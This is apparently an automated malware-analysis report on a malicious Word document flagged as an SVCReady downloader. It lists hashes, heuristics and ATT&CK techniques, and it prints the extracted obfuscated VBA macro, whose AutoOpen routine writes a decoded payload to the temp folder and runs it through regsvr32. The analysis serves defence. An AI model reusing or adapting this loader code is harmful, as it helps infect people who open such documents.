Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e4aecb7ffc7c53d8…

MALICIOUS

Office (OOXML)

115.2 KB Created: 2020-07-23 09:17:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07
MD5: a4d2dad881bf1caf7a1bf352b469b711 SHA-1: 4b37d59f2a417823948493c679b1e07943e8bacf SHA-256: e4aecb7ffc7c53d86191864ee60fe6c9e59d0d8250ce0412e69d29de8a4fab73
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing a VBA macro with an AutoOpen subroutine. This macro uses WshShell.exec to run a file named '1.jpg' located in the temporary directory. The macro also constructs the path to this file using Environ("tmp"), which resolves to the user's temporary directory. This indicates the document is designed to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
    • http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
    • http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4792 bytes
SHA-256: 61d97b569a1407a24a19304cbbc32be8bc1fbcd1dfa7208a9ed6558836bfe3c2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bbc79467"
Function a016c332()
a016c332 = ActiveWindow.DisplayLeftScrollBar
End Function
Function ca09aeed()
ca09aeed = ActiveWindow.Left
End Function
Function bbae29b5()
bbae29b5 = 10744.411065918
End Function
Function cbc4d8e4()
cbc4d8e4 = Application.ActiveDocument.AttachedTemplate
End Function
Sub AutoOpen()
Dim d3f0c64c As New dcb13349
aaa = c891bee4(d13fa101)
b196ad7f = d3f0c64c.d2c1fced(aaa, "")
ae610e55 eb6f8b4e, b196ad7f
Dim b034ccb1 As New WshShell
Call b034ccb1.exec(ecde239a & " " & eb6f8b4e)
End Sub

Attribute VB_Name = "f9f3fb37"
Function db0feade()
db0feade = ActiveWindow.HorizontalPercentScrolled
End Function
Function b31ce60b()
b31ce60b = ActiveWindow.StyleAreaWidth
End Function
Function d8cd4856()
d8cd4856 = 17508 / 6
End Function
Function d0d048c9()
d0d048c9 = ActiveWindow.HorizontalPercentScrolled
End Function
Sub ae610e55(f0a0a2c3, cf1076eb)
Dim dc2058c8
dc2058c8 = FreeFile
Open f0a0a2c3 For Output As #dc2058c8
Print #dc2058c8, b3062764(cf1076eb)
Close #dc2058c8
End Sub
Function eb6f8b4e()
eb6f8b4e = Environ("tmp") & "\1.jpg"
End Function
Function a21a5d01()
a21a5d01 = ActiveWindow.VerticalPercentScrolled
End Function
Function f65e87ab()
f65e87ab = "Misplace gondolas delegation windowless dilemma"
End Function
Function f6d6392f()
f6d6392f = 41114.073787526
End Function
Function d58d4d56(bdf5b14cnp As String) As Boolean
If 509 > Len(bdf5b14cnp) Then
d58d4d56 = False
End If
End Function
Function c891bee4(da260a86)
For a950a1bb = 1 To Len(da260a86) Step 3
cbf611e4 = cbf611e4 & Mid(da260a86, a950a1bb, 1)
Next
c891bee4 = cbf611e4
End Function
Function a36723a7()
a36723a7 = "ajHLBqi"
End Function
Function c04c394e()
c04c394e = ActiveWindow.DisplayVerticalRuler
End Function
Function c47655c4()
c47655c4 = ActiveWindow.SplitVertical
End Function
Function a6c5678b()
a6c5678b = 1453294464 / 28736
End Function
Sub ba4b90ba()
End Sub
Function b19494bc()
b19494bc = 56
End Function
Function c3893206()
c3893206 = ActiveWindow.View
End Function
Function d56315d1()
d56315d1 = ActiveWindow.Height
End Function
Function c3d2ac9a()
c3d2ac9a = ActiveWindow.Index
End Function
Function b3062764(cf1076eb)
b3062764 = StrConv(cf1076eb, 64)
End Function
Function a8c38f44()
a8c38f44 = ActiveWindow.DisplayLeftScrollBar
End Function
Function dcf62b5f()
dcf62b5f = ActiveWindow.HorizontalPercentScrolled
End Function
Function c153b519()
c153b519 = ActiveWindow.Height
End Function
Function f220613f()
f220613f = ActiveWindow.Top
End Function
Function d13fa101()
d13fa101 = ActiveDocument.Shapes(1).AlternativeText
End Function
Function a304ddd3()
a304ddd3 = Application.ActiveDocument.CompatibilityMode
End Function
Function c932ae8a()
c932ae8a = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function bdc742e7()
bdc742e7 = ActiveWindow.HorizontalPercentScrolled
End Function
Function cb793ea6()
cb793ea6 = "Indices enshrine agog happenings"
End Function
Function ecde239a()
ecde239a = c891bee4("rd0e1egf9s9bv31rc738b202")
End Function

Attribute VB_Name = "dcb13349"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function a98983b0() As Long
Dim a224b4f2 As Long
Dim adbc91f9 As Integer
adbc91f9 = 7
For a224b4f2 = 11 To 60
adbc91f9 = adbc91f9 - a224b4f2
Next a224b4f2
a98983b0 = adbc91f9
End Function
Function f198f26f()
f198f26f = Application.ActiveDocument.Application
End Function
Function ed7034a3()
ed7034a3 = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Funct
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 28672 bytes
SHA-256: cc61cb82c60284f861f55264e58922c6938ccc7f54d5334d9283975f2fa79658

Open this report in the interactive analyzer, or submit your own file for analysis.